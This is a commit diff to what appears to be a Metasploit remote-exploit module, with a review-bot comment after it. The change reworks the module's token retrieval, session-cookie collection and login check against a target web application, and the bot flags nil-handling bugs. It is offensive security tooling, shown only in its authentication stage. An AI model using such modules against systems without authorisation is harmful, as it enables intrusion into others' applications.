Fix auth check and cookie handling

unstable
Meatballs 2013-04-26 17:10:24 +01:00
parent 025315e4e4
commit a043d3b456
1 changed files with 15 additions and 8 deletions


@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
if (response.body !~ /"token"\s*value="([^"]*)"/) if (response.body !~ /"token"\s*value="([^"]*)"/)
fail_with(Exploit::Failure::NotFound, "Couldn't find token and can't continue without it. Is URI set correctly?") fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
else else
print_good("Retrieved token") print_good("Retrieved token")
end end
@ -134,17 +134,24 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
end end
if login.code != 302
fail_with(Exploit::Failure::NotFound, "Authentication failed.")
else
print_good("Authentication successful")
end
token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first
cookie = "" cookie = ""
cookie_names.each do |name| cookie_names.each do |name|
cookie << login.get_cookie(name) << " " c = login.get_cookie(name)
cookie << c << " " unless c.nil?
end
login_check = send_request_cgi({
'uri' => uri('index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookie
})
if login_check.body =~ /Welcome to/
fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
else
print_good("Authentication successful")
end end
db = rand_text_alpha(3+rand(3)) db = rand_text_alpha(3+rand(3))
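Review bot: With the `login.code != 302` check removed, nothing guarantees a `Location` header before `login.headers['Location'].scan(...)` runs, so a non-redirect response raises NoMethodError on nil instead of ending in a clean `fail_with`; the same applies to `login_check.body` if `send_request_cgi` returns nil (presumably possible, given the existing "Failed to retrieve webpage." guard on the earlier request). Guard both, for example `fail_with(Exploit::Failure::NotFound, "No redirect after login.") if login.headers['Location'].nil?` and `fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.") if login_check.nil?`. `token` can also be nil when the scan matches nothing, and it is then passed unchecked as the `token` query parameter. The enclosing method starts and ends outside the hunk.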